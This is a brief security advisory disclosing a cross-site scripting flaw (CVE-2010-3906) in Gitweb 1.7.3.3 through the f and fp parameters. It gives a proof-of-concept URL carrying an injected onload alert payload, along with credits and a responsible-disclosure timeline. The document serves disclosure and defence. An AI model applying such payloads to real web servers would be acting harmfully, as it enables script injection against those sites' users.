Gitweb 1.7.3.3 Cross Site Scripting

`>-8 Description 8-<  
Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and previous versions  
allows remote attackers to inject arbitrary web script or HTML code via f and fp variables.  
  
>-8 Proof Of Concept 8-<  
http://localhost/?p=foo/bar/ph33r.git;a=blobdiff;f=[XSS];fp=[XSS]  
[XSS] => "><body onload="alert('xss')"> <a  
  
  
>-8 Credits 8-<  
Emanuele 'emgent' Gentili   
  
>-8 Notes 8-<  
http://www.tigersecurity.it/nuova-vulnerabilita-di-gitweb-rilasciata-in-responsible-disclosure-dal-tiger-team-di-tiger-security-s-r-l/index.aspx  
  
>-8 Responsible Disclosure 8-<  
  
13-12-2010 Initial contact with upstream and vendor-sec  
13-12-2010 Vendor Response and CVE-2010-3906 assignation  
15-12-2010 Public Disclosure  
  
`